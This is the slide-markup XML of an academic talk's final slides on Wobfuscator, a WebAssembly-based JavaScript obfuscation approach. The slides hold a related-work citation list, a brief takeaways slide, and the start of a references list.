              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1828" b="1"/>
              <a:t>Obfuscation Studies and Techniques</a:t>
            </a:r>
            <a:endParaRPr sz="1828" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You and Kim, 2010 [1]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Xu et al., 2012 [2]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ceccato et al., 2015 [3]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hammad et al., 2018 [4]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wang et al., 2019 [5]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Skolka et al., 2019 [6]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fass et al., 2019 [7]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-318632" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1828" b="1"/>
              <a:t>Malware Detection</a:t>
            </a:r>
            <a:endParaRPr sz="1828" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rieck et al., 2010 [8]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cova et al., 2010 [9]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Curtsinger et al., 2011 [10]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Canali et al., 2011 [11]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kolbitsch et al., 2012 [12]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Xu et al., 2013 [13]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Xue et al., 2015 [14]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wang et al., 2015 [15]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wang et al., 2016 [16]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Seshagiri et al., 2016 [17]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kim et al., 2017 [18]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fass et al., 2018 [19]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fass et al., 2019 [20]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ndichu et al., 2019 [21]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-287655" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sarker et al., 2020 [22]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="907" name="Google Shape;907;p76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4832400" y="1152475"/>
            <a:ext cx="3999900" cy="3750300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-310832" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Obfuscation Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kaplan et al., 2011 [23]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Al-Taharwa et al., 2015 [24]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sarker et al., 2020 [22]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-310832" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>WebAssembly and WebAssembly Security</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Haas et al., 2017 [25]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Konoth et al., 2018 [26]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rüth et al., 2018 [27]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wang et al., 2018 [28]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fu et al., 2018 [29]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Szanto et al., 2018 [30]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Musch et al., 2019 [31]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kharraz et al., 2019 [32]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lehmann et al., 2019 [33]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Romano et al., 2020 [34]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lehmann et al., 2020 [35]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-299085" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hilbig et al., 2021 [36]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="45720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77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="712925"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Wobfuscator: Takeaways</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913" name="Google Shape;913;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1038174"/>
            <a:ext cx="8520600" cy="3808145"/>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2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscation approach built on a set of transformation rules</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Effective against state-of-the-art malware detectors</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Motivate future work on cross-language detection </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Google Shape;914;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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="97222"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="920" name="Google Shape;920;p7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62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I. You and K. Yim, “Malware obfuscation techniques: A brief survey,” in 2010 International conference on broadband, wireless computing, communication and applications. IEEE, 2010, pp. 297–300.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-300037" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
